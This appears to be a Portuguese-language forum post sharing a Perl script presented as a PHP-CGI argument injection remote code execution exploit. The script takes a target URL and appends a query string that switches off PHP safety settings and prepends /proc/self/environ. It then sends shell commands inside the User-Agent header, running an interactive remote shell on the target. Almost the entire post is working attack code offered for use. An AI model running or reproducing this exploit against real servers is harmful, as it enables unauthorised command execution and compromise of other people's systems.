Início
- Código:
#!/usr/bin/perl
require LWP::UserAgent;
my $useragent = LWP::UserAgent->new;
$x = "?-n+-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3d/proc/self/environ";
print q {
[+] PHP-CGI Argument Injection - RCE Exploit -
[-] By MMxM
Digite a url , exe: www.abc.com
[+] };
chomp($url = <STDIN>);
if ( $url !~ /^http:/ ) {
$url = 'http://' . $url;
}
if ( $url !~ /\/$/ ) {
$url = $url . '/';
}
$target = "$url$x";
print q "
[*] Sh3ll
$ ";
chomp( $shell = <STDIN> );
while($shell !~ "exit") {
$inject="mmxm<?system(\"$shell 2> /dev/stdout\"); ?>mmxm\');?>";
$useragent->agent("$inject");
my $response = $useragent->get($target);
if ($response->content=~ /mmxm(.*)mmxm/s){print $1;}
print q "$ ";
chomp( $shell = <STDIN> );
}
Participe do fórum, é rápido e fácil